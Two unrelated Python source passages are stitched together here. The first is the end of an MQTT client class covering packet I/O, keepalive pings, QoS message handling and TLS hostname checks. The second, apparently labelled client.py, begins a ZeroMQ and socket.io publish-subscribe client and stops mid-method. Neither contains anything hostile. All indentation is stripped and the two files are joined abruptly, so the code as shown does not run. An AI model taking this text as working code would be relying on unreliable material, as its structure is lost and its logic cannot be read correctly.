# fail due to longer length, so save current data and current position.
# After all data is read, send to _mqtt_handle_packet() to deal with.
# Finally, free the memory and reset everything to starting conditions.
if self._in_packet['command'] == 0:
try:
if self._ssl:
command = self._ssl.read(1)
else:
command = self._sock.recv(1)
except socket.error as err:
if self._ssl and (err.errno == ssl.SSL_ERROR_WANT_READ or err.errno == ssl.SSL_ERROR_WANT_WRITE):
return MQTT_ERR_AGAIN
if err.errno == EAGAIN:
return MQTT_ERR_AGAIN
print(err)
return 1
else:
if len(command) == 0:
return 1
command = struct.unpack("!B", command)
self._in_packet['command'] = command[0]
if self._in_packet['have_remaining'] == 0:
# Read remaining
# Algorithm for decoding taken from pseudo code at
# http://publib.boulder.ibm.com/infocenter/wmbhelp/v6r0m0/topic/com.ibm.etools.mft.doc/ac10870_.htm
while True:
try:
if self._ssl:
byte = self._ssl.read(1)
else:
byte = self._sock.recv(1)
except socket.error as err:
if self._ssl and (err.errno == ssl.SSL_ERROR_WANT_READ or err.errno == ssl.SSL_ERROR_WANT_WRITE):
return MQTT_ERR_AGAIN
if err.errno == EAGAIN:
return MQTT_ERR_AGAIN
print(err)
return 1
else:
byte = struct.unpack("!B", byte)
byte = byte[0]
self._in_packet['remaining_count'].append(byte)
# Max 4 bytes length for remaining length as defined by protocol.
# Anything more likely means a broken/malicious client.
if len(self._in_packet['remaining_count']) > 4:
return MQTT_ERR_PROTOCOL
self._in_packet['remaining_length'] = self._in_packet['remaining_length'] + (byte & 127)*self._in_packet['remaining_mult']
self._in_packet['remaining_mult'] = self._in_packet['remaining_mult'] * 128
if (byte & 128) == 0:
break
self._in_packet['have_remaining'] = 1
self._in_packet['to_process'] = self._in_packet['remaining_length']
while self._in_packet['to_process'] > 0:
try:
if self._ssl:
data = self._ssl.read(self._in_packet['to_process'])
else:
data = self._sock.recv(self._in_packet['to_process'])
except socket.error as err:
if self._ssl and (err.errno == ssl.SSL_ERROR_WANT_READ or err.errno == ssl.SSL_ERROR_WANT_WRITE):
return MQTT_ERR_AGAIN
if err.errno == EAGAIN:
return MQTT_ERR_AGAIN
print(err)
return 1
else:
self._in_packet['to_process'] = self._in_packet['to_process'] - len(data)
self._in_packet['packet'] = self._in_packet['packet'] + data
# All data for this packet is read.
self._in_packet['pos'] = 0
rc = self._packet_handle()
# Free data and reset values
self._in_packet = dict(
command=0,
have_remaining=0,
remaining_count=[],
remaining_mult=1,
remaining_length=0,
packet=b"",
to_process=0,
pos=0)
self._msgtime_mutex.acquire()
self._last_msg_in = time.time()
self._msgtime_mutex.release()
return rc
def _packet_write(self):
self._current_out_packet_mutex.acquire()
while self._current_out_packet:
packet = self._current_out_packet
try:
if self._ssl:
write_length = self._ssl.write(packet['packet'][packet['pos']:])
else:
write_length = self._sock.send(packet['packet'][packet['pos']:])
except AttributeError:
self._current_out_packet_mutex.release()
return MQTT_ERR_SUCCESS
except socket.error as err:
self._current_out_packet_mutex.release()
if self._ssl and (err.errno == ssl.SSL_ERROR_WANT_READ or err.errno == ssl.SSL_ERROR_WANT_WRITE):
return MQTT_ERR_AGAIN
if err.errno == EAGAIN:
return MQTT_ERR_AGAIN
print(err)
return 1
if write_length > 0:
packet['to_process'] = packet['to_process'] - write_length
packet['pos'] = packet['pos'] + write_length
if packet['to_process'] == 0:
if (packet['command'] & 0xF0) == PUBLISH and packet['qos'] == 0:
self._callback_mutex.acquire()
if self.on_publish:
self._in_callback = True
self.on_publish(self, self._userdata, packet['mid'])
self._in_callback = False
self._callback_mutex.release()
if (packet['command'] & 0xF0) == DISCONNECT:
self._current_out_packet_mutex.release()
self._msgtime_mutex.acquire()
self._last_msg_out = time.time()
self._msgtime_mutex.release()
self._callback_mutex.acquire()
if self.on_disconnect:
self._in_callback = True
self.on_disconnect(self, self._userdata, 0)
self._in_callback = False
self._callback_mutex.release()
if self._ssl:
self._ssl.close()
self._ssl = None
if self._sock:
self._sock.close()
self._sock = None
return MQTT_ERR_SUCCESS
self._out_packet_mutex.acquire()
if len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.pop(0)
else:
self._current_out_packet = None
self._out_packet_mutex.release()
else:
pass # FIXME
self._current_out_packet_mutex.release()
self._msgtime_mutex.acquire()
self._last_msg_out = time.time()
self._msgtime_mutex.release()
return MQTT_ERR_SUCCESS
def _easy_log(self, level, buf):
if self.on_log:
self.on_log(self, self._userdata, level, buf)
def _check_keepalive(self):
now = time.time()
self._msgtime_mutex.acquire()
last_msg_out = self._last_msg_out
last_msg_in = self._last_msg_in
self._msgtime_mutex.release()
if (self._sock is not None or self._ssl is not None) and (now - last_msg_out >= self._keepalive or now - last_msg_in >= self._keepalive):
if self._state == mqtt_cs_connected and self._ping_t == 0:
self._send_pingreq()
self._msgtime_mutex.acquire()
self._last_msg_out = now
self._last_msg_in = now
self._msgtime_mutex.release()
else:
if self._ssl:
self._ssl.close()
self._ssl = None
elif self._sock:
self._sock.close()
self._sock = None
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
else:
rc = 1
self._callback_mutex.acquire()
if self.on_disconnect:
self._in_callback = True
self.on_disconnect(self, self._userdata, rc)
self._in_callback = False
self._callback_mutex.release()
def _mid_generate(self):
self._last_mid = self._last_mid + 1
if self._last_mid == 65536:
self._last_mid = 1
return self._last_mid
def _topic_wildcard_len_check(self, topic):
# Search for + or # in a topic. Return MQTT_ERR_INVAL if found.
# Also returns MQTT_ERR_INVAL if the topic string is too long.
# Returns MQTT_ERR_SUCCESS if everything is fine.
if '+' in topic or '#' in topic or len(topic) == 0 or len(topic) > 65535:
return MQTT_ERR_INVAL
else:
return MQTT_ERR_SUCCESS
def _send_pingreq(self):
self._easy_log(MQTT_LOG_DEBUG, "Sending PINGREQ")
rc = self._send_simple_command(PINGREQ)
if rc == MQTT_ERR_SUCCESS:
self._ping_t = time.time()
return rc
def _send_pingresp(self):
self._easy_log(MQTT_LOG_DEBUG, "Sending PINGRESP")
return self._send_simple_command(PINGRESP)
def _send_puback(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBACK (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBACK, mid, False)
def _send_pubcomp(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBCOMP (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBCOMP, mid, False)
def _pack_remaining_length(self, packet, remaining_length):
remaining_bytes = []
while True:
byte = remaining_length % 128
remaining_length = remaining_length // 128
# If there are more digits to encode, set the top bit of this digit
if remaining_length > 0:
byte = byte | 0x80
remaining_bytes.append(byte)
packet.extend(struct.pack("!B", byte))
if remaining_length == 0:
# FIXME - this doesn't deal with incorrectly large payloads
return packet
def _pack_str16(self, packet, data):
if sys.version_info[0] < 3:
if isinstance(data, bytearray):
packet.extend(struct.pack("!H", len(data)))
packet.extend(data)
elif isinstance(data, str):
udata = data.encode('utf-8')
pack_format = "!H" + str(len(udata)) + "s"
packet.extend(struct.pack(pack_format, len(udata), udata))
elif isinstance(data, unicode):
udata = data.encode('utf-8')
pack_format = "!H" + str(len(udata)) + "s"
packet.extend(struct.pack(pack_format, len(udata), udata))
else:
raise TypeError
else:
if isinstance(data, bytearray) or isinstance(data, bytes):
packet.extend(struct.pack("!H", len(data)))
packet.extend(data)
elif isinstance(data, str):
udata = data.encode('utf-8')
pack_format = "!H" + str(len(udata)) + "s"
packet.extend(struct.pack(pack_format, len(udata), udata))
else:
raise TypeError
def _send_publish(self, mid, topic, payload=None, qos=0, retain=False, dup=False):
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
utopic = topic.encode('utf-8')
command = PUBLISH | ((dup&0x1)<<3) | (qos<<1) | retain
packet = bytearray()
packet.extend(struct.pack("!B", command))
if payload is None:
remaining_length = 2+len(utopic)
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBLISH (d"+str(dup)+", q"+str(qos)+", r"+str(int(retain))+", m"+str(mid)+", '"+topic+"' (NULL payload)")
else:
if isinstance(payload, str):
upayload = payload.encode('utf-8')
payloadlen = len(upayload)
elif isinstance(payload, bytearray):
payloadlen = len(payload)
elif isinstance(payload, unicode):
upayload = payload.encode('utf-8')
payloadlen = len(upayload)
remaining_length = 2+len(utopic) + payloadlen
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBLISH (d"+str(dup)+", q"+str(qos)+", r"+str(int(retain))+", m"+str(mid)+", '"+topic+"', ... ("+str(payloadlen)+" bytes)")
if qos > 0:
# For message id
remaining_length = remaining_length + 2
self._pack_remaining_length(packet, remaining_length)
self._pack_str16(packet, topic)
if qos > 0:
# For message id
packet.extend(struct.pack("!H", mid))
if payload is not None:
if isinstance(payload, str):
pack_format = str(payloadlen) + "s"
packet.extend(struct.pack(pack_format, upayload))
elif isinstance(payload, bytearray):
packet.extend(payload)
elif isinstance(payload, unicode):
pack_format = str(payloadlen) + "s"
packet.extend(struct.pack(pack_format, upayload))
else:
raise TypeError('payload must be a string, unicode or a bytearray.')
return self._packet_queue(PUBLISH, packet, mid, qos)
def _send_pubrec(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBREC (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBREC, mid, False)
def _send_pubrel(self, mid, dup=False):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBREL (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBREL|2, mid, dup)
def _send_command_with_mid(self, command, mid, dup):
# For PUBACK, PUBCOMP, PUBREC, and PUBREL
if dup:
command = command | 8
remaining_length = 2
packet = struct.pack('!BBH', command, remaining_length, mid)
return self._packet_queue(command, packet, mid, 1)
def _send_simple_command(self, command):
# For DISCONNECT, PINGREQ and PINGRESP
remaining_length = 0
packet = struct.pack('!BB', command, remaining_length)
return self._packet_queue(command, packet, 0, 0)
def _send_connect(self, keepalive, clean_session):
if self._protocol == MQTTv31:
protocol = PROTOCOL_NAMEv31
proto_ver = 3
else:
protocol = PROTOCOL_NAMEv311
proto_ver = 4
remaining_length = 2+len(protocol) + 1+1+2 + 2+len(self._client_id)
connect_flags = 0
if clean_session:
connect_flags = connect_flags | 0x02
if self._will:
if self._will_payload is not None:
remaining_length = remaining_length + 2+len(self._will_topic) + 2+len(self._will_payload)
else:
remaining_length = remaining_length + 2+len(self._will_topic) + 2
connect_flags = connect_flags | 0x04 | ((self._will_qos&0x03) << 3) | ((self._will_retain&0x01) << 5)
if self._username:
remaining_length = remaining_length + 2+len(self._username)
connect_flags = connect_flags | 0x80
if self._password:
connect_flags = connect_flags | 0x40
remaining_length = remaining_length + 2+len(self._password)
command = CONNECT
packet = bytearray()
packet.extend(struct.pack("!B", command))
self._pack_remaining_length(packet, remaining_length)
packet.extend(struct.pack("!H"+str(len(protocol))+"sBBH", len(protocol), protocol, proto_ver, connect_flags, keepalive))
self._pack_str16(packet, self._client_id)
if self._will:
self._pack_str16(packet, self._will_topic)
if self._will_payload is None or len(self._will_payload) == 0:
packet.extend(struct.pack("!H", 0))
else:
self._pack_str16(packet, self._will_payload)
if self._username:
self._pack_str16(packet, self._username)
if self._password:
self._pack_str16(packet, self._password)
self._keepalive = keepalive
return self._packet_queue(command, packet, 0, 0)
def _send_disconnect(self):
return self._send_simple_command(DISCONNECT)
def _send_subscribe(self, dup, topics):
remaining_length = 2
for t in topics:
remaining_length = remaining_length + 2+len(t[0])+1
command = SUBSCRIBE | (dup<<3) | (1<<1)
packet = bytearray()
packet.extend(struct.pack("!B", command))
self._pack_remaining_length(packet, remaining_length)
local_mid = self._mid_generate()
packet.extend(struct.pack("!H", local_mid))
for t in topics:
self._pack_str16(packet, t[0])
packet.extend(struct.pack("B", t[1]))
return (self._packet_queue(command, packet, local_mid, 1), local_mid)
def _send_unsubscribe(self, dup, topics):
remaining_length = 2
for t in topics:
remaining_length = remaining_length + 2+len(t)
command = UNSUBSCRIBE | (dup<<3) | (1<<1)
packet = bytearray()
packet.extend(struct.pack("!B", command))
self._pack_remaining_length(packet, remaining_length)
local_mid = self._mid_generate()
packet.extend(struct.pack("!H", local_mid))
for t in topics:
self._pack_str16(packet, t)
return (self._packet_queue(command, packet, local_mid, 1), local_mid)
def _message_retry_check_actual(self, messages, mutex):
mutex.acquire()
now = time.time()
for m in messages:
if m.timestamp + self._message_retry < now:
if m.state == mqtt_ms_wait_for_puback or m.state == mqtt_ms_wait_for_pubrec:
m.timestamp = now
m.dup = True
self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
elif m.state == mqtt_ms_wait_for_pubrel:
m.timestamp = now
m.dup = True
self._send_pubrec(m.mid)
elif m.state == mqtt_ms_wait_for_pubcomp:
m.timestamp = now
m.dup = True
self._send_pubrel(m.mid, True)
mutex.release()
def _message_retry_check(self):
self._message_retry_check_actual(self._out_messages, self._out_message_mutex)
self._message_retry_check_actual(self._in_messages, self._in_message_mutex)
def _messages_reconnect_reset_out(self):
self._out_message_mutex.acquire()
self._inflight_messages = 0
for m in self._out_messages:
m.timestamp = 0
if self._max_inflight_messages == 0 or self._inflight_messages < self._max_inflight_messages:
if m.qos == 0:
m.state = mqtt_ms_publish
elif m.qos == 1:
#self._inflight_messages = self._inflight_messages + 1
if m.state == mqtt_ms_wait_for_puback:
m.dup = True
m.state = mqtt_ms_publish
elif m.qos == 2:
#self._inflight_messages = self._inflight_messages + 1
if m.state == mqtt_ms_wait_for_pubcomp:
m.state = mqtt_ms_resend_pubrel
m.dup = True
else:
if m.state == mqtt_ms_wait_for_pubrec:
m.dup = True
m.state = mqtt_ms_publish
else:
m.state = mqtt_ms_queued
self._out_message_mutex.release()
def _messages_reconnect_reset_in(self):
self._in_message_mutex.acquire()
for m in self._in_messages:
m.timestamp = 0
if m.qos != 2:
self._in_messages.pop(self._in_messages.index(m))
else:
# Preserve current state
pass
self._in_message_mutex.release()
def _messages_reconnect_reset(self):
self._messages_reconnect_reset_out()
self._messages_reconnect_reset_in()
def _packet_queue(self, command, packet, mid, qos):
mpkt = dict(
command = command,
mid = mid,
qos = qos,
pos = 0,
to_process = len(packet),
packet = packet)
self._out_packet_mutex.acquire()
self._out_packet.append(mpkt)
if self._current_out_packet_mutex.acquire(False):
if self._current_out_packet is None and len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.pop(0)
self._current_out_packet_mutex.release()
self._out_packet_mutex.release()
# Write a single byte to sockpairW (connected to sockpairR) to break
# out of select() if in threaded mode.
try:
self._sockpairW.send(sockpair_data)
except socket.error as err:
if err.errno != EAGAIN:
raise
if not self._in_callback and self._thread is None:
return self.loop_write()
else:
return MQTT_ERR_SUCCESS
def _packet_handle(self):
cmd = self._in_packet['command']&0xF0
if cmd == PINGREQ:
return self._handle_pingreq()
elif cmd == PINGRESP:
return self._handle_pingresp()
elif cmd == PUBACK:
return self._handle_pubackcomp("PUBACK")
elif cmd == PUBCOMP:
return self._handle_pubackcomp("PUBCOMP")
elif cmd == PUBLISH:
return self._handle_publish()
elif cmd == PUBREC:
return self._handle_pubrec()
elif cmd == PUBREL:
return self._handle_pubrel()
elif cmd == CONNACK:
return self._handle_connack()
elif cmd == SUBACK:
return self._handle_suback()
elif cmd == UNSUBACK:
return self._handle_unsuback()
else:
# If we don't recognise the command, return an error straight away.
self._easy_log(MQTT_LOG_ERR, "Error: Unrecognised command "+str(cmd))
return MQTT_ERR_PROTOCOL
def _handle_pingreq(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 0:
return MQTT_ERR_PROTOCOL
self._easy_log(MQTT_LOG_DEBUG, "Received PINGREQ")
return self._send_pingresp()
def _handle_pingresp(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 0:
return MQTT_ERR_PROTOCOL
# No longer waiting for a PINGRESP.
self._ping_t = 0
self._easy_log(MQTT_LOG_DEBUG, "Received PINGRESP")
return MQTT_ERR_SUCCESS
def _handle_connack(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
if len(self._in_packet['packet']) != 2:
return MQTT_ERR_PROTOCOL
(flags, result) = struct.unpack("!BB", self._in_packet['packet'])
if result == CONNACK_REFUSED_PROTOCOL_VERSION and self._protocol == MQTTv311:
self._easy_log(MQTT_LOG_DEBUG, "Received CONNACK ("+str(flags)+", "+str(result)+"), attempting downgrade to MQTT v3.1.")
# Downgrade to MQTT v3.1
self._protocol = MQTTv31
return self.reconnect()
if result == 0:
self._state = mqtt_cs_connected
self._easy_log(MQTT_LOG_DEBUG, "Received CONNACK ("+str(flags)+", "+str(result)+")")
self._callback_mutex.acquire()
if self.on_connect:
self._in_callback = True
if sys.version_info[0] < 3:
argcount = self.on_connect.func_code.co_argcount
else:
argcount = self.on_connect.__code__.co_argcount
if argcount == 3:
self.on_connect(self, self._userdata, result)
else:
flags_dict = dict()
flags_dict['session present'] = flags & 0x01
self.on_connect(self, self._userdata, flags_dict, result)
self._in_callback = False
self._callback_mutex.release()
# Start counting for stable connection
self._backoffCore.startStableConnectionTimer()
if result == 0:
rc = 0
self._out_message_mutex.acquire()
for m in self._out_messages:
m.timestamp = time.time()
if m.state == mqtt_ms_queued:
self.loop_write() # Process outgoing messages that have just been queued up
self._out_message_mutex.release()
return MQTT_ERR_SUCCESS
if m.qos == 0:
self._in_callback = True # Don't call loop_write after _send_publish()
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
self._in_callback = False
if rc != 0:
self._out_message_mutex.release()
return rc
elif m.qos == 1:
if m.state == mqtt_ms_publish:
self._inflight_messages = self._inflight_messages + 1
m.state = mqtt_ms_wait_for_puback
self._in_callback = True # Don't call loop_write after _send_publish()
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
self._in_callback = False
if rc != 0:
self._out_message_mutex.release()
return rc
elif m.qos == 2:
if m.state == mqtt_ms_publish:
self._inflight_messages = self._inflight_messages + 1
m.state = mqtt_ms_wait_for_pubrec
self._in_callback = True # Don't call loop_write after _send_publish()
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
self._in_callback = False
if rc != 0:
self._out_message_mutex.release()
return rc
elif m.state == mqtt_ms_resend_pubrel:
self._inflight_messages = self._inflight_messages + 1
m.state = mqtt_ms_wait_for_pubcomp
self._in_callback = True # Don't call loop_write after _send_pubrel()
rc = self._send_pubrel(m.mid, m.dup)
self._in_callback = False
if rc != 0:
self._out_message_mutex.release()
return rc
self.loop_write() # Process outgoing messages that have just been queued up
self._out_message_mutex.release()
return rc
elif result > 0 and result < 6:
return MQTT_ERR_CONN_REFUSED
else:
return MQTT_ERR_PROTOCOL
def _handle_suback(self):
self._easy_log(MQTT_LOG_DEBUG, "Received SUBACK")
pack_format = "!H" + str(len(self._in_packet['packet'])-2) + 's'
(mid, packet) = struct.unpack(pack_format, self._in_packet['packet'])
pack_format = "!" + "B"*len(packet)
granted_qos = struct.unpack(pack_format, packet)
self._callback_mutex.acquire()
if self.on_subscribe:
self._in_callback = True
self.on_subscribe(self, self._userdata, mid, granted_qos)
self._in_callback = False
self._callback_mutex.release()
return MQTT_ERR_SUCCESS
def _handle_publish(self):
rc = 0
header = self._in_packet['command']
message = MQTTMessage()
message.dup = (header & 0x08)>>3
message.qos = (header & 0x06)>>1
message.retain = (header & 0x01)
pack_format = "!H" + str(len(self._in_packet['packet'])-2) + 's'
(slen, packet) = struct.unpack(pack_format, self._in_packet['packet'])
pack_format = '!' + str(slen) + 's' + str(len(packet)-slen) + 's'
(message.topic, packet) = struct.unpack(pack_format, packet)
if len(message.topic) == 0:
return MQTT_ERR_PROTOCOL
if sys.version_info[0] >= 3:
message.topic = message.topic.decode('utf-8')
if message.qos > 0:
pack_format = "!H" + str(len(packet)-2) + 's'
(message.mid, packet) = struct.unpack(pack_format, packet)
message.payload = packet
self._easy_log(
MQTT_LOG_DEBUG,
"Received PUBLISH (d"+str(message.dup)+
", q"+str(message.qos)+", r"+str(message.retain)+
", m"+str(message.mid)+", '"+message.topic+
"', ... ("+str(len(message.payload))+" bytes)")
message.timestamp = time.time()
if message.qos == 0:
self._handle_on_message(message)
return MQTT_ERR_SUCCESS
elif message.qos == 1:
rc = self._send_puback(message.mid)
self._handle_on_message(message)
return rc
elif message.qos == 2:
rc = self._send_pubrec(message.mid)
message.state = mqtt_ms_wait_for_pubrel
self._in_message_mutex.acquire()
self._in_messages.append(message)
self._in_message_mutex.release()
return rc
else:
return MQTT_ERR_PROTOCOL
def _handle_pubrel(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
if len(self._in_packet['packet']) != 2:
return MQTT_ERR_PROTOCOL
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received PUBREL (Mid: "+str(mid)+")")
self._in_message_mutex.acquire()
for i in range(len(self._in_messages)):
if self._in_messages[i].mid == mid:
# Only pass the message on if we have removed it from the queue - this
# prevents multiple callbacks for the same message.
self._handle_on_message(self._in_messages[i])
self._in_messages.pop(i)
self._inflight_messages = self._inflight_messages - 1
if self._max_inflight_messages > 0:
self._out_message_mutex.acquire()
rc = self._update_inflight()
self._out_message_mutex.release()
if rc != MQTT_ERR_SUCCESS:
self._in_message_mutex.release()
return rc
self._in_message_mutex.release()
return self._send_pubcomp(mid)
self._in_message_mutex.release()
return MQTT_ERR_SUCCESS
def _update_inflight(self):
# Dont lock message_mutex here
for m in self._out_messages:
if self._inflight_messages < self._max_inflight_messages:
if m.qos > 0 and m.state == mqtt_ms_queued:
self._inflight_messages = self._inflight_messages + 1
if m.qos == 1:
m.state = mqtt_ms_wait_for_puback
elif m.qos == 2:
m.state = mqtt_ms_wait_for_pubrec
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
if rc != 0:
return rc
else:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
def _handle_pubrec(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received PUBREC (Mid: "+str(mid)+")")
self._out_message_mutex.acquire()
for m in self._out_messages:
if m.mid == mid:
m.state = mqtt_ms_wait_for_pubcomp
m.timestamp = time.time()
self._out_message_mutex.release()
return self._send_pubrel(mid, False)
self._out_message_mutex.release()
return MQTT_ERR_SUCCESS
def _handle_unsuback(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received UNSUBACK (Mid: "+str(mid)+")")
self._callback_mutex.acquire()
if self.on_unsubscribe:
self._in_callback = True
self.on_unsubscribe(self, self._userdata, mid)
self._in_callback = False
self._callback_mutex.release()
return MQTT_ERR_SUCCESS
def _handle_pubackcomp(self, cmd):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received "+cmd+" (Mid: "+str(mid)+")")
self._out_message_mutex.acquire()
for i in range(len(self._out_messages)):
try:
if self._out_messages[i].mid == mid:
# Only inform the client the message has been sent once.
self._callback_mutex.acquire()
if self.on_publish:
self._out_message_mutex.release()
self._in_callback = True
self.on_publish(self, self._userdata, mid)
self._in_callback = False
self._out_message_mutex.acquire()
self._callback_mutex.release()
self._out_messages.pop(i)
self._inflight_messages = self._inflight_messages - 1
if self._max_inflight_messages > 0:
rc = self._update_inflight()
if rc != MQTT_ERR_SUCCESS:
self._out_message_mutex.release()
return rc
self._out_message_mutex.release()
return MQTT_ERR_SUCCESS
except IndexError:
# Have removed item so i>count.
# Not really an error.
pass
self._out_message_mutex.release()
return MQTT_ERR_SUCCESS
def _handle_on_message(self, message):
self._callback_mutex.acquire()
matched = False
for t in self.on_message_filtered:
if topic_matches_sub(t[0], message.topic):
self._in_callback = True
t[1](self, self._userdata, message)
self._in_callback = False
matched = True
if matched == False and self.on_message:
self._in_callback = True
self.on_message(self, self._userdata, message)
self._in_callback = False
self._callback_mutex.release()
def _thread_main(self):
self._state_mutex.acquire()
if self._state == mqtt_cs_connect_async:
self._state_mutex.release()
self.reconnect()
else:
self._state_mutex.release()
self.loop_forever()
def _host_matches_cert(self, host, cert_host):
if cert_host[0:2] == "*.":
if cert_host.count("*") != 1:
return False
host_match = host.split(".", 1)[1]
cert_match = cert_host.split(".", 1)[1]
if host_match == cert_match:
return True
else:
return False
else:
if host == cert_host:
return True
else:
return False
def _tls_match_hostname(self):
try:
cert = self._ssl.getpeercert()
except AttributeError:
# the getpeercert can throw Attribute error: object has no attribute 'peer_certificate'
# Don't let that crash the whole client. See also: http://bugs.python.org/issue13721
raise ssl.SSLError('Not connected')
san = cert.get('subjectAltName')
if san:
have_san_dns = False
for (key, value) in san:
if key == 'DNS':
have_san_dns = True
if self._host_matches_cert(self._host.lower(), value.lower()) == True:
return
if key == 'IP Address':
have_san_dns = True
if value.lower() == self._host.lower():
return
if have_san_dns:
# Only check subject if subjectAltName dns not found.
raise ssl.SSLError('Certificate subject does not match remote hostname.')
subject = cert.get('subject')
if subject:
for ((key, value),) in subject:
if key == 'commonName':
if self._host_matches_cert(self._host.lower(), value.lower()) == True:
return
raise ssl.SSLError('Certificate subject does not match remote hostname.')
# Compatibility class for easy porting from mosquitto.py.
class Mosquitto(Client):
def __init__(self, client_id="", clean_session=True, userdata=None):
super(Mosquitto, self).__init__(client_id, clean_session, userdata)
|
client.py
|
import json
import os
import threading
import uuid
import weakref
from urllib.parse import urljoin
import msgpack
import portpicker
import socketio
import zmq
from loguru import logger
from .pack import serialize_data
from .watcher import Watcher
from ..utils import (
DEFAULT_HWM,
DEFAULT_ZMQ_IO_THREADS,
INPROC_INFO_ADDR,
get_config_path,
ping_server,
)
ENDPOINT_TYPE_MAP = {
zmq.PUB: "zmq_pub",
zmq.PUSH: "zmq_push",
}
class PublishManager:
def __init__(self, ctx, sio_client, server_config):
self.ctx = ctx
self.sio_client = sio_client
self.local_ip = server_config["ip"]
self.root_dir = os.path.join(
server_config["root_dir"], f"{os.getpid()}-socket-{str(uuid.uuid4())}"
)
os.makedirs(self.root_dir, exist_ok=True)
self.socks = {}
self.endpoints = []
self.packer = msgpack.Packer(autoreset=False)
self.packer_lock = threading.Lock()
def close(self, linger=-1):
for sock in self.socks.values():
sock.close(linger=linger)
def register_all(self):
self.sio_client.emit("register", self.endpoints)
def _create_socket(self, sock_type, topic, ipc=True, conflate=False):
key = (sock_type, topic, ipc, conflate)
if key in self.socks:
return
if ipc:
path = os.path.join(self.root_dir, f"{os.getpid()}-{topic}-{sock_type}-{conflate}")
addr = f"ipc://{path}"
else:
port = portpicker.pick_unused_port()
addr = f"tcp://{self.local_ip}:{port}"
self.socks[key] = self.ctx.socket(sock_type)
self.socks[key].set_hwm(DEFAULT_HWM)
self.socks[key].bind(addr)
if conflate:
self.socks[key].setsockopt(zmq.CONFLATE, 1)
item = {
"type": ENDPOINT_TYPE_MAP[sock_type],
"addr": addr,
"topic": topic,
"host": self.local_ip,
}
self.endpoints.append(item)
self.register_all()
def send(
self,
sock_type,
topic,
data,
ipc=True,
noblock=False,
conflate=False,
compression=None,
**compression_args,
):
assert sock_type in [zmq.PUB, zmq.PUSH]
self._create_socket(sock_type, topic, ipc, conflate)
key = (sock_type, topic, ipc, conflate)
with self.packer_lock:
with serialize_data(
data, compression, self.packer, **compression_args
) as packed_data:
flags = zmq.NOBLOCK if noblock else 0
self.socks[key].send(packed_data, flags=flags)
class Client:
def __init__(self, server_name):
self.ctx = zmq.Context(DEFAULT_ZMQ_IO_THREADS)
self.endpoint_info = {}
self.watchers = weakref.WeakSet()
config_path = get_config_path(server_name)
assert os.path.exists(config_path)
with open(config_path, "r") as f:
self.server_config = json.load(f)
# check connection
try:
pid = self.server_config["pid"]
url = self.server_config["url"]
ping_server(urljoin(url, "/echo"), pid)
except BaseException:
logger.exception(
f"perwez server can not be accessed. name {server_name}, url {url}, pid {pid}"
)
raise
self.sio_client = socketio.Client()
self.sio_client.on("connect", self._on_connect)
self.sio_client.on("update", self._on_info_updated)
self.pub_manager = PublishManager(self.ctx, self.sio_client, self.server_config)
init_ev = threading.Event()
self._info_sock = None
self._info_lock = threading.Lock()
self._sio_thread = threading.Thread(
target=self._sio_poller, args=(init_ev,), daemon=True
)
self._sio_thread.start()
init_ev.wait()
def close(self, linger=-1):
self.pub_manager.close(linger)
if self.sio_client.connected:
self.sio_client.disconnect()
# pylint: disable=protected-access
if self.sio_client._reconnect_task is not None:
self.sio_client._reconnect_abort.set()
# pylint: enable=protected-access
def _sio_poller(self, init_ev):
self._info_sock = self.ctx.socket(zmq.PUB)
self._info_sock.setsockopt(zmq.CONFLATE, 1)
self._info_sock.bind(INPROC_INFO_ADDR)
self.sio_client.connect(self.server_config["url"], transports="websocket")
init_ev.set()
self.sio_client.wait()
def _on_connect(self):
self.pub_manager.register_all()
def _on_info_updated(self, endpoints):
new_info = {}
for x in endpoints:
new_info.setdefault(x["topic"], [])
new_info[x["topic"]].append(x)
with self._info_lock:
self.endpoint_info = new_info
self._info_sock.send_json(new_info)
def publish(
self, topic, data, ipc=True, noblock=False, conflate=True, compression=None, **compression_args
):
self.pub_manager.send(
zmq.PUB, topic, data, ipc, noblock, conflate, compression, **compression_args
)
def push(
self, topic, data, ipc=True, noblock=False, conflate=False, compression=None, **compression_args
):
self.pub_manager.send(
zmq.PUSH, topic, data, ipc, noblock, conflate, compression, **compression_args
)
def subscribe(self, topic, conflate):
with self._info_lock:
watcher = Watcher(
self.ctx, topic, conflate, self.endpoint_info.get(topic)
)
